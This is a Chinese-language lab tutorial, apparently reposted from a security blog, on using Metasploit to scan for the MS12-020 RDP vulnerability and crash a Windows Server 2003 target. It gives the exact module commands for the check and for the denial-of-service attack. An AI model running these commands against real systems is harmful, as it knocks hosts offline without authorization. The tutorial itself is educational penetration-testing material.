2026-05-07 05:22:23 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文详细介绍了使用Metasploit框架进行ms12-020漏洞渗透测试的完整流程，包括实验环境搭建、漏洞检测模块使用、攻击执行及结果验证。通过具体命令演示了如何利用ms12020maxchannelids模块导致Windows靶机蓝屏，并强调该漏洞仅在启用RDP服务时存在风险。文档提供了可操作的技术指导，帮助读者掌握Metasploit基础操作和漏洞利用方法。 综合评分： 81 文章分类： 渗透测试,漏洞分析,安全工具,实战经验,WEB安全

cover_image

黑客万能工具包

原创

建哥聊安全建哥聊安全

建哥聊安全

2026年5月6日 09:33 湖南

在小说阅读器读本章

去阅读

Metasploit配置使用1

实验目的

熟悉ms12-020漏洞的原理及利用方法，掌握Metasploit的配置使用方法。

实验环境

操作机：Kali2018-TS

（1）操作系统：Kali Linux 2018.4

（2）登录账号密码：操作系统账号root，密码Sangfor!7890

靶机：B-SQLi-dvwa

（1）操作系统：Windows Server 2003

（2）安装的应用软件：PHPStudy 2013、DVWA漏洞网站环境

（3）登录账号密码：操作系统账号Administrator，密码Sangfor!7890

实验原理

（1）关于Metasploit Metasploit是一个强大的开源平台，可以用来开发、测试和使用恶意代码，同时为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。

（2）关于ms12-020（Windows远程桌面协议RDP远程代码执行漏洞）微软安全公告KB2671387：远程桌面中的漏洞可能允许远程执行代码

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2012/ms12-020

此安全更新可解决远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制RDP数据包，则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下，任何Windows操作系统都未启用远程桌面协议（RDP），没有启用RDP的系统不受威胁。

实验步骤

1．启动Metasploit

（1）在操作机Kali2018-TS上点击左侧菜单中的终端图标，启动终端：

（2）在终端使用如下命令，启动Metasploit终端（提示符msf>）：

msfdb init && msfconsole

2．检测靶机是否存在ms12-020漏洞

（1）在Metasploit终端下输入以下命令查找ms12-020相关的模块：

search ms12-020

搜索的结果中，第一项为ms12-020漏洞利用模块，第二项为ms12-020漏洞检测模块：

（2）分别输入以下命令，使用ms12_020_check模块对目标机进行漏洞检测，以确认目标机存在ms12-020漏洞：

use auxiliary/scanner/rdp/ms12_020_check //使用ms12_020_check模块

show options //查看该模块需要设置哪些参数

set RHOSTS [靶机IP] //设置目标机的IP地址

run //执行

检测结果显示，靶机存在ms12-020漏洞！

3．利用ms12-020漏洞对靶机进行攻击

在Metasploit终端下分别输入以下命令，使用ms12_020_maxchannelids模块对目标机的ms12-020漏洞进行利用：

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用ms12_020_maxchannelids模块

show options //查看该模块需要设置哪些参数

set RHOST [靶机IP] //设置目标机的IP地址

run //执行

此时，靶机被攻击后出现蓝屏：

实验至此结束。

实验总结

本次实验，成功利用Metasploit工具对存在ms12-020漏洞的靶机进行了攻击，熟悉了ms12-020漏洞的原理及利用方法，同时也掌握了Metasploit的配置使用方法。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全建哥聊安全建哥聊安全《黑客万能工具包》